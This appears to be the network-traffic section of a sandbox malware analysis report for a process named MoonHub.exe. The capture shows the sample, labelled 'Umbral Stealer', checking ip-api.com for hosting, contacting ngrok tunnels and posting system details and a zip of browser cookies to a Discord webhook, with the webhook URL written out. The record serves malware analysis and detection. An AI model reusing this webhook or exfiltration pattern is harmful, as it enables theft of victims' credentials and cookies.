                                                                                                                                                                              Jan 12, 2025 07:11:53.845139980 CET11057500323.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:53.845890999 CET11057500333.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:53.845962048 CET5003311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:53.846256018 CET5003311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:53.851030111 CET11057500333.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:55.476845026 CET11057500333.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:55.480513096 CET5003311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:55.684045076 CET5003311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:55.685338020 CET5003411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:55.689148903 CET11057500333.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:55.690283060 CET11057500343.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:55.690376997 CET5003411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:55.690690994 CET5003411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:55.695516109 CET11057500343.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:57.354087114 CET11057500343.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:57.354264975 CET5003411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:57.559247971 CET5003411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:57.560249090 CET5003511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:57.564160109 CET11057500343.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:57.565222979 CET11057500353.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:57.565294981 CET5003511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:57.565606117 CET5003511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:57.570341110 CET11057500353.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:59.194257975 CET11057500353.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:59.194457054 CET5003511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:59.402853012 CET5003511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:59.403805017 CET5003611057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:59.407912970 CET11057500353.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:59.408796072 CET11057500363.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:59.408869028 CET5003611057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:59.409118891 CET5003611057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:59.413917065 CET11057500363.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:01.056932926 CET11057500363.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:01.057219028 CET5003611057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:01.262160063 CET5003611057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:01.263166904 CET5003711057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:01.267011881 CET11057500363.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:01.268085957 CET11057500373.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:01.268167973 CET5003711057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:01.268445969 CET5003711057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:01.273201942 CET11057500373.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:02.924506903 CET11057500373.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:02.924720049 CET5003711057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:03.137217999 CET5003711057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:03.138202906 CET5003811057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:03.142293930 CET11057500373.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:03.143163919 CET11057500383.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:03.143265963 CET5003811057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:03.143642902 CET5003811057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:03.148601055 CET11057500383.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:04.794106960 CET11057500383.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:04.794186115 CET5003811057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:04.996747971 CET5003811057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:04.997723103 CET5003911057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:05.002096891 CET11057500383.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:05.002649069 CET11057500393.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:05.002765894 CET5003911057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:05.003019094 CET5003911057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:05.007895947 CET11057500393.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:06.632081985 CET11057500393.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:06.632229090 CET5003911057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:06.840451002 CET5003911057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:06.841382980 CET5004011057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:06.845392942 CET11057500393.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:06.846293926 CET11057500403.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:06.846373081 CET5004011057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:06.846676111 CET5004011057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:06.851551056 CET11057500403.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:08.478605032 CET11057500403.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:08.478744030 CET5004011057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:08.684058905 CET5004011057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:08.684956074 CET5004111057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:08.689121962 CET11057500403.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:08.689909935 CET11057500413.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:08.690002918 CET5004111057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:08.690299988 CET5004111057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:08.695132971 CET11057500413.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:10.339994907 CET11057500413.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:10.340250015 CET5004111057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:10.543399096 CET5004111057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:10.544101000 CET5004211057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:10.548353910 CET11057500413.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:10.548993111 CET11057500423.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:10.549069881 CET5004211057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:10.549349070 CET5004211057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:10.554162979 CET11057500423.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:12.199153900 CET11057500423.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:12.199237108 CET5004211057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:12.402780056 CET5004211057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:12.403721094 CET5004311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:12.407737017 CET11057500423.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:12.408624887 CET11057500433.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:12.408713102 CET5004311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:12.408946991 CET5004311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:12.413817883 CET11057500433.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:14.040996075 CET11057500433.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:14.041102886 CET5004311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:14.246881008 CET5004311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:14.247539997 CET5004411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:14.251810074 CET11057500433.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:14.252423048 CET11057500443.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:14.252494097 CET5004411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:14.252779007 CET5004411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:14.257575035 CET11057500443.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:15.882213116 CET11057500443.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:15.882930040 CET5004411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:16.090418100 CET5004411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:16.091231108 CET5004511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:16.095526934 CET11057500443.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:16.096205950 CET11057500453.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:16.096292019 CET5004511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:16.096533060 CET5004511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:16.101340055 CET11057500453.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:17.726883888 CET11057500453.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:17.728424072 CET5004511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:20.574762106 CET5004511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:20.575650930 CET5004611057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:20.579858065 CET11057500453.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:20.580503941 CET11057500463.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:20.580601931 CET5004611057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:20.580954075 CET5004611057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:20.585896015 CET11057500463.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:22.228754044 CET11057500463.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:22.228951931 CET5004611057192.168.2.53.78.28.71

                                                                                                                                                                              UDP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Jan 12, 2025 07:10:21.935300112 CET5014653192.168.2.51.1.1.1
                                                                                                                                                                              Jan 12, 2025 07:10:21.944957018 CET53501461.1.1.1192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:22.306783915 CET6245453192.168.2.51.1.1.1
                                                                                                                                                                              Jan 12, 2025 07:10:22.315609932 CET53624541.1.1.1192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:25.130633116 CET6193753192.168.2.51.1.1.1
                                                                                                                                                                              Jan 12, 2025 07:10:25.139559984 CET53619371.1.1.1192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:37.264584064 CET6542553192.168.2.51.1.1.1
                                                                                                                                                                              Jan 12, 2025 07:10:37.273447990 CET53654251.1.1.1192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:02.358464003 CET6178353192.168.2.51.1.1.1
                                                                                                                                                                              Jan 12, 2025 07:11:02.365344048 CET53617831.1.1.1192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:29.089546919 CET6006053192.168.2.51.1.1.1
                                                                                                                                                                              Jan 12, 2025 07:11:29.096240997 CET53600601.1.1.1192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:37.030709982 CET5648553192.168.2.51.1.1.1
                                                                                                                                                                              Jan 12, 2025 07:11:37.039302111 CET53564851.1.1.1192.168.2.5

                                                                                                                                                                              DNS Queries

                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Jan 12, 2025 07:10:21.935300112 CET192.168.2.51.1.1.10x3727Standard query (0)coprophile.bounceme.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:10:22.306783915 CET192.168.2.51.1.1.10x514bStandard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:10:25.130633116 CET192.168.2.51.1.1.10xf971Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:10:37.264584064 CET192.168.2.51.1.1.10xc007Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:11:02.358464003 CET192.168.2.51.1.1.10x9dabStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:11:29.089546919 CET192.168.2.51.1.1.10xbd84Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:11:37.030709982 CET192.168.2.51.1.1.10xb1f1Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false

                                                                                                                                                                              DNS Answers

                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Jan 12, 2025 07:10:22.315609932 CET1.1.1.1192.168.2.50x514bNo error (0)0.tcp.eu.ngrok.io18.153.198.123A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:10:25.139559984 CET1.1.1.1192.168.2.50xf971No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:10:37.273447990 CET1.1.1.1192.168.2.50xc007No error (0)0.tcp.eu.ngrok.io18.153.198.123A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:11:02.365344048 CET1.1.1.1192.168.2.50x9dabNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:11:29.096240997 CET1.1.1.1192.168.2.50xbd84No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:11:29.096240997 CET1.1.1.1192.168.2.50xbd84No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:11:29.096240997 CET1.1.1.1192.168.2.50xbd84No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:11:29.096240997 CET1.1.1.1192.168.2.50xbd84No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:11:29.096240997 CET1.1.1.1192.168.2.50xbd84No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 12, 2025 07:11:37.039302111 CET1.1.1.1192.168.2.50xb1f1No error (0)0.tcp.eu.ngrok.io3.78.28.71A (IP address)IN (0x0001)false

                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                              • discord.com
                                                                                                                                                                              • ip-api.com

                                                                                                                                                                              HTTP Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.549709208.95.112.1801784C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 12, 2025 07:10:25.145576954 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 12, 2025 07:10:25.684659004 CET175INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Sun, 12 Jan 2025 06:10:24 GMT
                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              X-Ttl: 60
                                                                                                                                                                              X-Rl: 44
                                                                                                                                                                              Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                              Data Ascii: false


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.549947208.95.112.1801784C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 12, 2025 07:11:02.375327110 CET55OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                              Jan 12, 2025 07:11:02.877388954 CET381INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Sun, 12 Jan 2025 06:11:01 GMT
                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                              Content-Length: 204
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              X-Ttl: 22
                                                                                                                                                                              X-Rl: 43
                                                                                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                              Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.550018162.159.135.2324431784C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-12 06:11:29 UTC360OUTPOST /api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw HTTP/1.1
                                                                                                                                                                              Accept: application/json
                                                                                                                                                                              User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                              Host: discord.com
                                                                                                                                                                              Content-Length: 938
                                                                                                                                                                              Expect: 100-continue
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-12 06:11:29 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                              2025-01-12 06:11:29 UTC938OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 34 33 36 34 33 32 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 32 45 44 39 32 37 34 32 2d 38 39 44 43 2d 44 44 37 32 2d 39 32 45 38 2d 38 36 39 46 41 35 41 36 36 34 39 33 5c 72 5c 6e 43 50 55 3a 20 49 6e
                                                                                                                                                                              Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 436432\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 2ED92742-89DC-DD72-92E8-869FA5A66493\r\nCPU: In
                                                                                                                                                                              2025-01-12 06:11:29 UTC1302INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sun, 12 Jan 2025 06:11:29 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 45
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                              x-ratelimit-limit: 5
                                                                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                                                                              x-ratelimit-reset: 1736662291
                                                                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                                                                              via: 1.1 google
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W2qTdgF1Cr38SEOGT23HWMs6OeP2AjvXe7equFCOi%2Fg5%2BwmV0tBGXLwLfu%2FlHCjDB9G1NO7lVFjLmxZQ05gmsEGqFdLEJMQ6q2VAgIo4M3DjVLI%2FrsnCdsgugyIE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Set-Cookie: __cfruid=1a2e9aa9e0e9b0ac8198ee6fe4f49730073d799f-1736662289; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                              Set-Cookie: _cfuvid=ob.OhzKQJmx9WAujruvt5OUCQLs9zf27vN7AvFbXxI4-1736662289919-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 900afd4ebf5178e7-EWR
                                                                                                                                                                              {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.550020162.159.135.2324431784C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-12 06:11:30 UTC531OUTPOST /api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw HTTP/1.1
                                                                                                                                                                              Accept: application/json
                                                                                                                                                                              User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                                                                              Content-Type: multipart/form-data; boundary="703c72e1-c87c-4eef-8ef2-55b55c6bd982"
                                                                                                                                                                              Host: discord.com
                                                                                                                                                                              Cookie: __cfruid=1a2e9aa9e0e9b0ac8198ee6fe4f49730073d799f-1736662289; _cfuvid=ob.OhzKQJmx9WAujruvt5OUCQLs9zf27vN7AvFbXxI4-1736662289919-0.0.1.1-604800000
                                                                                                                                                                              Content-Length: 656684
                                                                                                                                                                              Expect: 100-continue
                                                                                                                                                                              2025-01-12 06:11:30 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                              2025-01-12 06:11:30 UTC40OUTData Raw: 2d 2d 37 30 33 63 37 32 65 31 2d 63 38 37 63 2d 34 65 65 66 2d 38 65 66 32 2d 35 35 62 35 35 63 36 62 64 39 38 32 0d 0a
                                                                                                                                                                              Data Ascii: --703c72e1-c87c-4eef-8ef2-55b55c6bd982
                                                                                                                                                                              2025-01-12 06:11:30 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 34 33 36 34 33 32 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 34 33 36 34 33 32 2e 7a 69 70 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-436432.zip; filename*=utf-8''Umbral-436432.zip
                                                                                                                                                                              2025-01-12 06:11:30 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 60 09 2c 5a 1f 2a 43 8d ed 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 4b 72 82 30 00 00 d0 75 9c f1 28 a1 09 21 a4 5d 74 01 2d 08 34 02 ca 6f 60 d3 01 a2 a0 83 32 7c 1a 94 d3 77 a6 07 e8 3b c0 53 9a be 6f ba 93 52 f7 37 10 1f 13 0b bc 00 db e0 91 05 30 21 1a d1 de 54 0d 53 a6 23 5d 27 00 87 df 9e 71 04 2a 52 09 c4 08 22 0d 62 b2 dd 28 ff 04 54 67 18 eb 7f 01 43 0c f8 ee 27 a0 18 bf 5b 67 2a 43 7b b7 c0 7d 91 f7 b4 5d 4e 10 c5 ad 91 4e 5d f5 a8 6e 52 a4 c5 52 3b f7 21 5d 33 c7 48 b0 26 29 d9 fb 38 95 8b 3c 0c af 55 99 9f 1b 15 ba c6 3c 14 66 4a fd 80 d3 51 5e 55 3f 73 87 71 25 8c 25 2d 17 ce 1c 34 16 9c bd d2 ec 12 33 f7 ac f6
                                                                                                                                                                              Data Ascii: PK`,Z*C!#Browsers\Cookies\Chrome Cookies.txt}Kr0u(!]t-4o`2|w;SoR70!TS#]'q*R"b(TgC'[g*C{}]NN]nRR;!]3H&)8<U<fJQ^U?sq%%-43
